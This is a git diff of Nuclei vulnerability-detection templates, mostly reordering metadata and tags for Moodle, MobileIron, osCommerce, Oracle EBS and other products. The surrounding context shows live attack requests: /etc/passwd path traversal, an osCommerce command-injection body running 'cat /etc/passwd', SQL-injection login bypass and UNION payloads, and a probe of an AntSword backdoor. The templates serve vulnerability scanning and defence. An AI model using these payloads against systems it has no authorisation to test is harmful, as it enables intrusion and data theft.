b/http/vulnerabilities/metersphere/metersphere-plugin-rce.yaml @@ -11,11 +11,11 @@ info: - https://github.com/metersphere/metersphere classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 metadata: - max-request: 2 verified: true + max-request: 2 tags: metersphere,rce,intrusive http: @@ -37,7 +37,6 @@ http: null ------WebKitFormBoundaryreButJNjkCniQExX-- - - | POST /plugin/customMethod HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml index ace2dd073f..198064015d 100644 --- a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml @@ -5,22 +5,22 @@ info: author: meme-lord severity: critical description: Ivanti MobileIron is susceptible to remote code execution via the Apache Log4j2 library. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. + remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. reference: - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q - https://www.lunasec.io/docs/blog/log4j-zero-day/ - https://www.zdnet.com/article/mobileiron-customers-urged-to-patch-systems-due-to-potential-log4j-exploitation/ - https://logging.apache.org/log4j/2.x/security.html - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 - remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-917 metadata: + verified: true max-request: 1 shodan-query: http.html:"MobileIron" - verified: true tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml b/http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml index b41361689a..2d99ff7c3d 100644 --- a/http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml +++ b/http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml @@ -11,19 +11,21 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:F/RL:W/RC:C cvss-score: 7.5 cwe-id: CWE-22 - tags: moodle,lfi,edb metadata: max-request: 1 + tags: moodle,lfi,edb http: - method: GET path: - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd" + matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" diff --git a/http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml b/http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml index 1340df69c1..9f90b8aa79 100644 --- a/http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml +++ b/http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: moodle,xss metadata: max-request: 1 + tags: moodle,xss http: - method: GET diff --git a/http/vulnerabilities/moodle/moodle-xss.yaml b/http/vulnerabilities/moodle/moodle-xss.yaml index 6e941baed5..a47a2848cf 100644 --- a/http/vulnerabilities/moodle/moodle-xss.yaml +++ b/http/vulnerabilities/moodle/moodle-xss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: moodle,xss metadata: max-request: 1 + tags: moodle,xss,intrusive http: - method: GET diff --git a/http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml b/http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml index 07b676e6a4..1a3c90eafd 100644 --- a/http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml +++ b/http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/NetMizer%20%E6%97%A5%E5%BF%97%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20cmd.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 - fofa-query: title="NetMizer 日志管理系统" - shodan-query: title:"NetMizer" verified: true + max-request: 1 + shodan-query: title:"NetMizer" + fofa-query: title="NetMizer 日志管理系统" tags: netmizer,cmd,rce http: diff --git a/http/vulnerabilities/netmizer/netmizer-data-listing.yaml b/http/vulnerabilities/netmizer/netmizer-data-listing.yaml index 640054d5e2..236954d541 100644 --- a/http/vulnerabilities/netmizer/netmizer-data-listing.yaml +++ b/http/vulnerabilities/netmizer/netmizer-data-listing.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/NetMizer%20%E6%97%A5%E5%BF%97%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20data%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 - fofa-query: title="NetMizer 日志管理系统" - shodan-query: title:"NetMizer" verified: true + max-request: 1 + shodan-query: title:"NetMizer" + fofa-query: title="NetMizer 日志管理系统" tags: netmizer,exposure,listing http: diff --git a/http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml b/http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml index 1be90dce9e..a66f2a3c7a 100644 --- a/http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml +++ b/http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: netsweeper,redirect,packetstorm metadata: max-request: 1 + tags: netsweeper,redirect,packetstorm http: - method: GET diff --git a/http/vulnerabilities/netsweeper/netsweeper-rxss.yaml b/http/vulnerabilities/netsweeper/netsweeper-rxss.yaml index 0bd32b26f5..f3eb100085 100644 --- a/http/vulnerabilities/netsweeper/netsweeper-rxss.yaml +++ b/http/vulnerabilities/netsweeper/netsweeper-rxss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: edb,xss,packetstorm,netsweeper metadata: max-request: 1 + tags: edb,xss,packetstorm,netsweeper http: - method: GET diff --git a/http/vulnerabilities/nps/nps-auth-bypass.yaml b/http/vulnerabilities/nps/nps-auth-bypass.yaml index 17b76ecb77..9efe155eef 100644 --- a/http/vulnerabilities/nps/nps-auth-bypass.yaml +++ b/http/vulnerabilities/nps/nps-auth-bypass.yaml @@ -9,8 +9,8 @@ info: reference: - https://mari0er.club/post/nps.html/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"window.nps" tags: nps,auth-bypass diff --git a/http/vulnerabilities/nuxt/nuxt-js-lfi.yaml b/http/vulnerabilities/nuxt/nuxt-js-lfi.yaml index adbf12107c..cba264f3ae 100644 --- a/http/vulnerabilities/nuxt/nuxt-js-lfi.yaml +++ b/http/vulnerabilities/nuxt/nuxt-js-lfi.yaml @@ -11,11 +11,11 @@ info: - https://bryces.io/blog/nuxt3 - https://twitter.com/fofabot/status/1669339995780558849 metadata: - fofa-query: body="buildAssetsDir" && body="__nuxt" + verified: "true" max-request: 2 shodan-query: html:"buildAssetsDir" "nuxt" - verified: "true" - tags: lfi,nuxtjs + fofa-query: body="buildAssetsDir" && body="__nuxt" + tags: huntr,lfi,nuxtjs http: - method: GET diff --git a/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml b/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml index 64b571c09d..3d87cda639 100644 --- a/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml +++ b/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml @@ -9,11 +9,11 @@ info: - https://bryces.io/blog/nuxt3 - https://twitter.com/fofabot/status/1669339995780558849 metadata: - fofa-query: body="buildAssetsDir" && body="__nuxt" + verified: "true" max-request: 2 shodan-query: html:"buildAssetsDir" "nuxt" - verified: "true" - tags: lfi,nuxtjs + fofa-query: body="buildAssetsDir" && body="__nuxt" + tags: huntr,lfi,nuxtjs http: - method: GET diff --git a/http/vulnerabilities/nuxt/nuxt-js-xss.yaml b/http/vulnerabilities/nuxt/nuxt-js-xss.yaml index 8864031fbb..41f952b4eb 100644 --- a/http/vulnerabilities/nuxt/nuxt-js-xss.yaml +++ b/http/vulnerabilities/nuxt/nuxt-js-xss.yaml @@ -11,11 +11,11 @@ info: - https://bryces.io/blog/nuxt3 - https://twitter.com/fofabot/status/1669339995780558849 metadata: + verified: "true" max-request: 1 shodan-query: html:"buildAssetsDir" "nuxt" fofa-query: body="buildAssetsDir" && body="__nuxt" - verified: "true" - tags: xss,nuxtjs,error + tags: huntr,xss,nuxtjs,error http: - method: GET diff --git a/http/vulnerabilities/opencpu/opencpu-rce.yaml b/http/vulnerabilities/opencpu/opencpu-rce.yaml index 64e672e410..b9b10cbda9 100644 --- a/http/vulnerabilities/opencpu/opencpu-rce.yaml +++ b/http/vulnerabilities/opencpu/opencpu-rce.yaml @@ -9,9 +9,9 @@ info: reference: - https://pulsesecurity.co.nz/articles/R-Shells - https://github.com/opencpu/opencpu/ - tags: rce,opencpu,oss metadata: max-request: 1 + tags: rce,opencpu,oss http: - method: POST @@ -23,9 +23,9 @@ http: headers: Content-Type: application/x-www-form-urlencoded - max-redirects: 2 redirects: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml b/http/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml index c032b439e0..c1a4914583 100644 --- a/http/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml +++ b/http/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf - tags: oracle,lfi metadata: max-request: 2 + tags: oracle,lfi http: - method: GET diff --git a/http/vulnerabilities/oracle/oracle-ebs-xss.yaml b/http/vulnerabilities/oracle/oracle-ebs-xss.yaml index 889450d29e..f6bebd14d0 100644 --- a/http/vulnerabilities/oracle/oracle-ebs-xss.yaml +++ b/http/vulnerabilities/oracle/oracle-ebs-xss.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf - tags: oracle,xss,ebs metadata: max-request: 3 + tags: oracle,xss,ebs,intrusive http: - method: GET @@ -28,6 +28,7 @@ http: - type: status status: - 200 + - type: word words: - "text/html" diff --git a/http/vulnerabilities/oracle/oracle-siebel-xss.yaml b/http/vulnerabilities/oracle/oracle-siebel-xss.yaml index 3b7c777e26..1f377dc4bd 100644 --- a/http/vulnerabilities/oracle/oracle-siebel-xss.yaml +++ b/http/vulnerabilities/oracle/oracle-siebel-xss.yaml @@ -5,6 +5,7 @@ info: author: dhiyaneshDK severity: high description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitrary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint. + remediation: Upgrade to Siebel Loyalty version 8.2 or later. reference: - https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html - https://exploit-db.com/exploits/47762 @@ -13,10 +14,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - remediation: Upgrade to Siebel Loyalty version 8.2 or later. - tags: xss,oracle,siebel,packetstorm,edb metadata: max-request: 1 + tags: xss,oracle,siebel,packetstorm,edb http: - method: GET diff --git a/http/vulnerabilities/oscommerce/oscommerce-rce.yaml b/http/vulnerabilities/oscommerce/oscommerce-rce.yaml index 1010c17a24..5048081022 100644 --- a/http/vulnerabilities/oscommerce/oscommerce-rce.yaml +++ b/http/vulnerabilities/oscommerce/oscommerce-rce.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.exploit-db.com/exploits/50128 - https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution - tags: rce,oscommerce,edb metadata: max-request: 2 + tags: rce,oscommerce,edb http: - raw: @@ -21,7 +21,6 @@ http: Content-Type: application/x-www-form-urlencoded DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A - - | GET /install/includes/configure.php HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/other/3cx-management-console.yaml b/http/vulnerabilities/other/3cx-management-console.yaml index 4a0c605a96..53ab42f9eb 100644 --- a/http/vulnerabilities/other/3cx-management-console.yaml +++ b/http/vulnerabilities/other/3cx-management-console.yaml @@ -23,6 +23,7 @@ http: - '{{BaseURL}}/Electron/download/windows/\windows\win.ini' stop-at-first-match: true + matchers-condition: or matchers: - type: word diff --git a/http/vulnerabilities/other/74cms-sqli.yaml b/http/vulnerabilities/other/74cms-sqli.yaml index 09256d5614..e2b458c569 100644 --- a/http/vulnerabilities/other/74cms-sqli.yaml +++ b/http/vulnerabilities/other/74cms-sqli.yaml @@ -11,10 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-89 - tags: 74cms,sqli metadata: max-request: 1 - + tags: 74cms,sqli variables: num: "999999999" diff --git a/http/vulnerabilities/other/WSO2-2019-0598.yaml b/http/vulnerabilities/other/WSO2-2019-0598.yaml index 762f94a85c..1e62a2742f 100644 --- a/http/vulnerabilities/other/WSO2-2019-0598.yaml +++ b/http/vulnerabilities/other/WSO2-2019-0598.yaml @@ -6,17 +6,17 @@ info: severity: medium description: | WSO2 prior to version 5.8.0 is susceptible to a server-side request forgery vulnerability. This vulnerability can be exploited by misusing the UI gadgets loading capability of the shindig web application. An attacker can alter a specific URL in the request causing the server to initiate a GET request to the altered URL. - reference: - - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0598 remediation: | Upgrade the product version to 5.8.0 or higher. + reference: + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0598 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 6.8 cwe-id: CWE-918 - tags: ssrf,wso2,shindig metadata: max-request: 1 + tags: ssrf,wso2,shindig http: - method: GET diff --git a/http/vulnerabilities/other/academy-lms-xss.yaml b/http/vulnerabilities/other/academy-lms-xss.yaml index 9171d97e5b..295947e90c 100644 --- a/http/vulnerabilities/other/academy-lms-xss.yaml +++ b/http/vulnerabilities/other/academy-lms-xss.yaml @@ -14,8 +14,8 @@ info: cvss-score: 5.4 cwe-id: CWE-80 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Academy LMS" tags: packetstorm,lms,academy,xss diff --git a/http/vulnerabilities/other/accent-microcomputers-lfi.yaml b/http/vulnerabilities/other/accent-microcomputers-lfi.yaml index 3de13ec5f6..89082a11f9 100644 --- a/http/vulnerabilities/other/accent-microcomputers-lfi.yaml +++ b/http/vulnerabilities/other/accent-microcomputers-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: microcomputers,accent,lfi metadata: max-request: 1 + tags: microcomputers,accent,lfi http: - method: GET @@ -23,7 +23,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/vulnerabilities/other/acme-xss.yaml b/http/vulnerabilities/other/acme-xss.yaml index f59ae907d1..25ba8c44be 100644 --- a/http/vulnerabilities/other/acme-xss.yaml +++ b/http/vulnerabilities/other/acme-xss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,acme metadata: max-request: 1 + tags: xss,acme http: - method: GET @@ -26,6 +26,7 @@ http: - type: word words: - "alert(document.domain)" + - type: word words: - "/xml" diff --git a/http/vulnerabilities/other/acti-video-lfi.yaml b/http/vulnerabilities/other/acti-video-lfi.yaml index 90516b2ac4..34b17f786d 100644 --- a/http/vulnerabilities/other/acti-video-lfi.yaml +++ b/http/vulnerabilities/other/acti-video-lfi.yaml @@ -9,10 +9,10 @@ info: reference: - https://www.cnblogs.com/hmesed/p/16292252.html metadata: - max-request: 1 verified: true - fofa-query: app="ACTi-视频监控" + max-request: 1 shodan-query: title:"Web Configurator" + fofa-query: app="ACTi-视频监控" tags: acti,lfi,iot,video,monitoring http: diff --git a/http/vulnerabilities/other/aerocms-sqli.yaml b/http/vulnerabilities/other/aerocms-sqli.yaml index 7f4b48df48..7e3c12b3c0 100644 --- a/http/vulnerabilities/other/aerocms-sqli.yaml +++ b/http/vulnerabilities/other/aerocms-sqli.yaml @@ -14,10 +14,9 @@ info: cvss-score: 9.8 cwe-id: CWE-89 metadata: - max-request: 2 verified: true + max-request: 2 tags: aero,cms,sqli,edb - variables: num: "999999999" @@ -28,6 +27,7 @@ http: - '{{BaseURL}}/cms/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml b/http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml index b670619fd8..76c1323f9a 100644 --- a/http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml +++ b/http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml @@ -8,8 +8,8 @@ info: - https://github.com/alibaba/anyproxy/issues/391 - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Alibaba%20AnyProxy%20fetchBody%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"anyproxy" tags: alibaba,anyproxy,lfi diff --git a/http/vulnerabilities/other/alumni-management-sqli.yaml b/http/vulnerabilities/other/alumni-management-sqli.yaml index 40384f4932..1847b23243 100644 --- a/http/vulnerabilities/other/alumni-management-sqli.yaml +++ b/http/vulnerabilities/other/alumni-management-sqli.yaml @@ -11,11 +11,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-29214 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 - tags: sqli,auth-bypass,cms,edb,alumni metadata: max-request: 2 + tags: sqli,auth-bypass,cms,edb,alumni http: - raw: @@ -25,12 +25,12 @@ http: Content-Type: application/x-www-form-urlencoded username=admin'+or+'1'%3D'1'%23&password={{rand_base(5)}} - - | GET /admin/index.php?page=home HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/antsword-backdoor.yaml b/http/vulnerabilities/other/antsword-backdoor.yaml index adfe036354..65c2b147ba 100644 --- a/http/vulnerabilities/other/antsword-backdoor.yaml +++ b/http/vulnerabilities/other/antsword-backdoor.yaml @@ -5,23 +5,25 @@ info: author: ffffffff0x severity: critical description: An AntSword application backdoor shell was discovered. + remediation: Reinstall AnstSword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms. reference: - https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-553 - remediation: Reinstall AnstSword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms. - tags: backdoor,antsword metadata: max-request: 1 + tags: backdoor,antsword http: - method: POST path: - "{{BaseURL}}/.antproxy.php" + headers: Content-Type: application/x-www-form-urlencoded + body: 'ant=echo md5("antproxy.php");' matchers-condition: and diff --git a/http/vulnerabilities/other/apache-druid-log4j.yaml b/http/vulnerabilities/other/apache-druid-log4j.yaml index a3878d8502..0f000f826f 100644 --- a/http/vulnerabilities/other/apache-druid-log4j.yaml +++ b/http/vulnerabilities/other/apache-druid-log4j.yaml @@ -10,8 +10,8 @@ info: cve-id: CVE-2021-44228 cwe-id: CWE-502 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Apache Druid" tags: cve,cve2021,rce,jndi,log4j,apache,druid,oast @@ -23,7 +23,7 @@ http: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" diff --git a/http/vulnerabilities/other/asanhamayesh-lfi.yaml b/http/vulnerabilities/other/asanhamayesh-lfi.yaml index ddcb614fa8..353f07c521 100644 --- a/http/vulnerabilities/other/asanhamayesh-lfi.yaml +++ b/http/vulnerabilities/other/asanhamayesh-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: asanhamayesh,lfi,traversal metadata: max-request: 1 + tags: asanhamayesh,lfi,traversal http: - method: GET diff --git a/http/vulnerabilities/other/aspcms-commentlist-sqli.yaml b/http/vulnerabilities/other/aspcms-commentlist-sqli.yaml index c2c1c61a3e..a9874ff62d 100644 --- a/http/vulnerabilities/other/aspcms-commentlist-sqli.yaml +++ b/http/vulnerabilities/other/aspcms-commentlist-sqli.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/cms/AspCMS/AspCMS%20commentList.asp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: - fofa-query: app="ASPCMS" - max-request: 1 verified: true + max-request: 1 + fofa-query: app="ASPCMS" tags: aspcms,sqli,unauth http: @@ -25,7 +25,6 @@ http: group: 1 regex: - "
(.*?)
" - matchers: - type: dsl dsl: diff --git a/http/vulnerabilities/other/aspnuke-openredirect.yaml b/http/vulnerabilities/other/aspnuke-openredirect.yaml index 465cd6dee4..aac313f3c8 100644 --- a/http/vulnerabilities/other/aspnuke-openredirect.yaml +++ b/http/vulnerabilities/other/aspnuke-openredirect.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: packetstorm,aspnuke,redirect metadata: max-request: 1 + tags: packetstorm,aspnuke,redirect http: - method: GET diff --git a/http/vulnerabilities/other/avada-xss.yaml b/http/vulnerabilities/other/avada-xss.yaml index 93027b86cf..994f835871 100644 --- a/http/vulnerabilities/other/avada-xss.yaml +++ b/http/vulnerabilities/other/avada-xss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,wp,wordpress,wp-theme,avada,wpscan metadata: max-request: 1 + tags: xss,wp,wordpress,wp-theme,avada,wpscan http: - method: GET diff --git a/http/vulnerabilities/other/avcon6-execl-lfi.yaml b/http/vulnerabilities/other/avcon6-execl-lfi.yaml index ecee030859..ece3cb8055 100644 --- a/http/vulnerabilities/other/avcon6-execl-lfi.yaml +++ b/http/vulnerabilities/other/avcon6-execl-lfi.yaml @@ -9,8 +9,8 @@ info: reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/AVCON6%20%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20org_execl_download.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="AVCON-6" tags: avcon6,lfi diff --git a/http/vulnerabilities/other/avcon6-lfi.yaml b/http/vulnerabilities/other/avcon6-lfi.yaml index 1ae56b3b3c..ef8f90d9a5 100644 --- a/http/vulnerabilities/other/avcon6-lfi.yaml +++ b/http/vulnerabilities/other/avcon6-lfi.yaml @@ -9,8 +9,8 @@ info: reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/AVCON6%20%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20download.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="AVCON-6" tags: avcon6,lfi diff --git a/http/vulnerabilities/other/bems-api-lfi.yaml b/http/vulnerabilities/other/bems-api-lfi.yaml index b7f2389c45..b7c017cada 100644 --- a/http/vulnerabilities/other/bems-api-lfi.yaml +++ b/http/vulnerabilities/other/bems-api-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,packetstorm metadata: max-request: 1 + tags: lfi,packetstorm http: - method: GET diff --git a/http/vulnerabilities/other/beward-ipcamera-disclosure.yaml b/http/vulnerabilities/other/beward-ipcamera-disclosure.yaml index c3eab9b88b..124d4873cd 100644 --- a/http/vulnerabilities/other/beward-ipcamera-disclosure.yaml +++ b/http/vulnerabilities/other/beward-ipcamera-disclosure.yaml @@ -12,14 +12,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: iot,camera,disclosure,edb metadata: max-request: 1 + tags: iot,camera,disclosure,edb http: - method: GET path: - "{{BaseURL}}/cgi-bin/operator/fileread?READ.filePath=/etc/passwd" + headers: Authorization: "Basic YWRtaW46YWRtaW4=" diff --git a/http/vulnerabilities/other/bitrix-open-redirect.yaml b/http/vulnerabilities/other/bitrix-open-redirect.yaml index 72901fa559..7f6908eb42 100644 --- a/http/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/http/vulnerabilities/other/bitrix-open-redirect.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: redirect,bitrix,packetstorm metadata: max-request: 12 + tags: redirect,bitrix,packetstorm http: - method: GET @@ -32,6 +32,7 @@ http: - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh' stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/vulnerabilities/other/blue-ocean-excellence-lfi.yaml b/http/vulnerabilities/other/blue-ocean-excellence-lfi.yaml index 7398704b1a..fcf0ef3014 100644 --- a/http/vulnerabilities/other/blue-ocean-excellence-lfi.yaml +++ b/http/vulnerabilities/other/blue-ocean-excellence-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: blue-ocean,lfi metadata: max-request: 1 + tags: blue-ocean,lfi http: - method: GET @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "toor:[x*]:0:0" diff --git 